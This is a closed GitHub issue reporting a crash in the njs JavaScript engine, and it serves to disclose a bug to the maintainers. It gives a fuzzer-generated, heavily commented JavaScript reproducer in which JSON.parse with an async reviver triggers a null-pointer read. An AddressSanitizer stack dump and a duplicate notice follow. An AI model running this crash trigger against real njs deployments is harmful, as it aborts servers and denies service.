

SEGV njs_function.c:443:13 in njs_function_lambda_frame #509

Closed
dramthy opened this issue Jun 1, 2022 · 1 comment



dramthy commented Jun 1, 2022

Environment

Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build   : 
     ./configure --cc=clang --address-sanitizer=YES     
     make

Proof of concept

function placeholder(){}
// Fuzzer-generated reproducer. Most statements below are inert: the template
// literals are ordinary string values that are assigned and never used, and
// several functions (v1, v67, v305, v320) are declared but never called. The
// crash is reached through the `switch (Math)` at the bottom: `case Math:` is
// the only arm that can match (switch uses strict equality), and its
// `JSON.parse(v310, v314)` call is where the stack dump enters njs_json_parse
// -> njs_json_internalize_property -> njs_function_apply before faulting in
// njs_function_lambda_frame (njs_function.c:443). Per the sanitizer output the
// fault is a READ of a zero-page address (0x342), i.e. a null-derived
// dereference; in a deployed engine this manifests as a process abort.
function main() {
// Declared, never called.
async function v1(v2,v3) {
    var v4 = await Map;
}
var v5 = {};
// v11 .. v60: template literals holding JS-looking text. They are plain
// strings; nothing in this script evaluates them.
var v11 = `
    var v12 = Object(-9007199254740993,-4027512271n);
`;
var v17 = `
    var v18 = (-256n)(-9007199254740993,-4027512271n);
`;
var v28 = `
    Object[-4027512271] **= -4027512271n;
    var v30 = Object(-9007199254740993,...-65536n);
`;
var v34 = `
    var v35 = Object(-9007199254740993,-4027512271n);
`;
var v38 = `
    var v39 = Object(-9007199254740993,-9007199254740993n);
`;
var v43 = `
    var v44 = undefined(-1290018985n,-4027512271n);
`;
var v50 = [-1000000.0,-1000000.0,-1000000.0];
var v58 = `
    var v59 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v60 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v61 = Object(0n,-4027512271n);
`;
// Declared, never called.
function v67(v68) {
    v68[1866532165] = Map;
}
// Executor for the `new Promise(v69)` call further down; the Promise
// constructor runs it synchronously during construction.
function v69(v70,v71) {
    var v78 = new Uint8ClampedArray();
    var v81 = {};
    var v82 = /gL8?/;
    var v83 = {};
    var v84 = [v81,v83,v82];
    function v86(v87) {
        v84[1866532165] = Map;
    }
    // Installed below as the "set" half of an accessor property.
    async function v90(v91,v92) {
        var v93 = await Map;
    }
    // Empty executor: v98 stays pending.
    function v94(v95,v96) {
    }
    var v98 = new Promise(v94);
    var v100 = v98["catch"]();
    // Accessor descriptor: getter is the Promise constructor itself, setter is v90.
    var v103 = {"get":Promise,"set":v90};
    var v104 = Object.defineProperty(v100,"constructor",v103);
    async function v105(v106,v107) {
        var v108 = await v104;
    }
    var v109 = v105();
    var v110 = v86(Map);
    var v111 = String();
    // v122 .. v238: more inert template-literal strings (see note above).
    var v122 = `
        var v123 = Object(-9007199254740993,-4027512271n);
    `;
    var v124 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
    `;
    var v130 = `
        var v132 = [-4027512271n,Object,-4027512271n,1,v78,-4027512271n,Object,Uint8ClampedArray,8980,Object];
        var v133 = Object();
        v133[-4027512271] **= -4027512271n;
    `;
    var v140 = `
        var v141 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
    `;
    var v148 = `
        var v149 = Object(-9007199254740993,-4027512271n,15034n);
    `;
    var v152 = `
        var v153 = Object(-4294967296,-4027512271n);
    `;
    var v161 = `
        var v162 = (-4027512271n)(-9007199254740993,-4027512271n);
    `;
    var v172 = `
        Object[-4027512271] **= -4027512271n;
        var v174 = Object(-9007199254740993,-4027512271n);
    `;
    var v176 = `
        var v177 = Object(-9007199254740993,-9007199254740993n);
    `;
    var v181 = `
        var v182 = undefined(-4027512271n,-4027512271n);
    `;
    var v187 = `
        var v188 = "bigint"();
        v188[-4027512271] **= -4027512271n;
        var v189 = Object(-4027512271n,-4027512271n);
    `;
    var v190 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v191 = Object(-9007199254740993,-4027512271n);
    `;
    var v195 = `
        var v196 = ReferenceError(-4027512271n,-4027512271n);
    `;
    // NOTE(review): Float64Array() without `new` throws a TypeError in
    // spec-compliant engines; inside a Promise executor that throw becomes a
    // rejection of v241 and the statements after this line would not run.
    // Confirm what njs does here before relying on anything below.
    var v199 = Float64Array();
    var v204 = `
        v199[-4027512271] **= -4027512271n;
        var v205 = Object(-9007199254740993,-4027512271n);
    `;
    var v206 = `
        var v207 = Object(-4027512271n,-4027512271n);
    `;
    var v211 = `
        var v212 = (-1070059123)(-9007199254740993,-4027512271n);
    `;
    var v213 = `
        var v214 = ArrayBuffer(-4027512271n,-9007199254740993n);
    `;
    var v220 = `
        var v221 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
    `;
    var v226 = `
        var v227 = (-4027512271n)();
        var v228 = v227(0n,-4027512271n);
    `;
    var v232 = `
        var v234 = Object();
        v234[-1316174388] >>= -4027512271n;
        var v236 = Object["getPrototypeOf"](v111,-4027512271n);
        var v237 = Object(-4027512271n,-4027512271n);
    `;
    var v238 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v239 = Symbol(-9007199254740993,-4027512271n);
    `;
    // Sets a property on the Promise constructor object itself.
    Promise[-4294967297] = Map;
}
var v241 = new Promise(v69);
var v249 = Object();
// v250 .. v288: inert template-literal strings (see note above).
var v250 = `
    var v251 = Object(-9007199254740993,-4027512271n);
`;
var v252 = `
    var v253 = v252();
    v253[-4027512271] **= -4027512271n;
    var v254 = Object(v249,-4027512271n);
`;
var v255 = `
    Object[-4027512271] **= -4027512271n;
    var v257 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v261 = `
    var v262 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v265 = `
    var v266 = (-4027512271n)(v50,-4027512271n);
`;
var v272 = `
    var v273 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v277 = `
    var v278 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v279 = `
    var v281 = Object();
    v281[-4027512271] **= -767560483n;
    var v282 = Object(-4027512271n,-3242169687n);
`;
var v283 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v284 = Object(-9007199254740993,-4027512271n);
`;
var v288 = `
    var v289 = (-9007199254740993)();
    v289[-4027512271] **= -4027512271n;
    var v290 = v289(0n,-4027512271n);
`;
// Nested array/object structure (with an empty Int16Array) that is serialized
// to JSON below; that JSON text is the input to the crashing JSON.parse call.
var v291 = [v5,v5,v5,v5,v5];
var v292 = {};
var v293 = [v292,v292,v291];
var v295 = new Int16Array();
var v296 = {};
var v297 = [v293,v296];
var v298 = {};
var v299 = [v295,v297,v298];
var v301 = [2332289465,v298,2332289465,2332289465];
var v303 = typeof Map;
// Declared, never called.
async function v305(v306,v307) {
    var v308 = await Map;
}
var v310 = JSON.stringify(v299);
// Math.cbrt() with no argument yields NaN, so `case v313` below can never match.
var v313 = Math.cbrt();
// Reviver passed to JSON.parse below: an async function with three parameters
// and an empty body. The stack dump (njs_json_internalize_property ->
// njs_function_apply -> njs_function_call2 -> njs_function_lambda_frame) is
// consistent with the engine faulting while setting up the call to this
// reviver; the async + three-parameter shape is what distinguishes it from a
// plain reviver, so it is the likely trigger.
async function v314(v315,v316,v317) {
}
// switch compares with strict equality: v313 is NaN, the numbers, Map, v299
// and v301 are not Math, so only the `case Math:` arm runs.
switch (Math) {
case v313:
    break;
case 2332289465:
case 2332289465:
    break;
case Math:
    // Declared, never called.
    async function v320(v321,v322) {
        var v323 = await Map;
    }
    // Crash site: JSON.parse with the async reviver v314 (see stack dump).
    var v324 = JSON.parse(v310,v314);
    break;
case Map:
case v299:
    break;
case v301:
    break;
case -9007199254740993:
}
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==8300==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000342 (pc 0x000000573313 bp 0x7ffe8d0e1110 sp 0x7ffe8d0e1060 T0)
==8300==The signal is caused by a READ memory access.
==8300==Hint: address points to the zero page.
    #0 0x573313 in njs_function_lambda_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:443:13
    #1 0x573802 in njs_function_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:153:16
    #2 0x573802 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:587:11
    #3 0x56e6b2 in njs_function_apply /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:186:12
    #4 0x56e6b2 in njs_json_internalize_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:937:11
    #5 0x56e536 in njs_json_internalize_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:912:23
    #6 0x567dea in njs_json_parse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:152:16
    #7 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
    #8 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
    #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #10 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
    #11 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
    #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #13 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
    #14 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
    #15 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
    #16 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
    #17 0x7f72273c8082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
    #18 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:443:13 in njs_function_lambda_frame
==8300==ABORTING

Credit
dramthy(@topsec alpha)


xeioex commented Jun 2, 2022

Duplicate of #506.
